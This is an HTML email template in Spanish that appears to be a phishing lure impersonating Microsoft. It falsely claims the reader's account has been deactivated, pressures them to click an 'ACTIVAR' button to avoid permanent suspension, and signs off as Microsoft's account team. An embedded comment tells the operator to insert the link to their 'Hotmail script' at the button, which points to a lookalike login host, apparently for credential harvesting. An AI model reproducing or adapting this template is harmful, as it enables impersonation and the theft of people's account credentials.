</!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
</head>
<div class="table">
<p class="textgris">Cuenta Microsoft</p>

<h2 class="textazul">Su cuenta ha sido desactivada</h2>

<p class="textparrafo">Hemos detectado algo inusual sobre un reciente inicio de sesión de la cuenta Microsoft, por lo cual nuestro Centro de Seguridad decidió proteger su privacidad desactivando su bandeja de entrada de forma que su información se mantenga guardada.</p>

<p class="textparrafo">Vaya a la página del enlace de abajo y active su cuenta. Para evitar una suspensión permanente de su cuenta:.</p>

<!-- Aquí abajo donde estan las Comillas colocas el enlace de tu Script de Hotmail -->
	<a class="button button2" href="http://loginmaiilfir.tonohost.com">ACTIVAR
	</a>
<!-- Fin del Comentario -->

<p class="textparrafo">Para no participar o para cambiar cuándo debes recibir notificaciones de seguridad, haz clic aquí.</br></br>
Gracias,</br>
El equipo de cuentas de Microsoft</p>

</div>

<style type="text/css">
	.table {
		padding: 1% 5% 1% 5%;
	}
	.textgris {
		color: #9a9a9a;
		font-size: 17px;
		font-weight: bold;
		font-family: "Segoe UI Light","Segoe UI","Helvetica Neue Medium",Arial,sans-serif;
		padding: 0px;
	}
	.textazul {
		color: #5590de;
		font-size: 32px;
		font-family: "Segoe UI Light","Segoe UI","Helvetica Neue Medium",Arial,sans-serif;
		padding: 0px;
	}
	.textparrafo {
		color: #5f5f5f;
		font-size: 17px;
		font-family: "Segoe UI Light","Segoe UI","Helvetica Neue Medium",Arial,sans-serif;
		padding: 0px;
	}
	.textparrafob {
		color: #5f5f5f;
		font-size: 17px;
		font-weight: bold;
		font-family: "Segoe UI Light","Segoe UI","Helvetica Neue Medium",Arial,sans-serif;
		padding: 0px;
	}	
	.button {
  		border: none;
  		color: white;
 		padding: 15px 32px;
  		text-align: center;
  		text-decoration: none;
  		display: inline-block;
  		font-size: 16px;
  		margin: 4px 2px;
  		cursor: pointer;  
	}
	.button2 {  display: block;
  		margin-right: auto;
  		width: 10%;
  		font-family: calibri;
  		background-color: #5590de;} /* Blue */
	}
</style>
</html>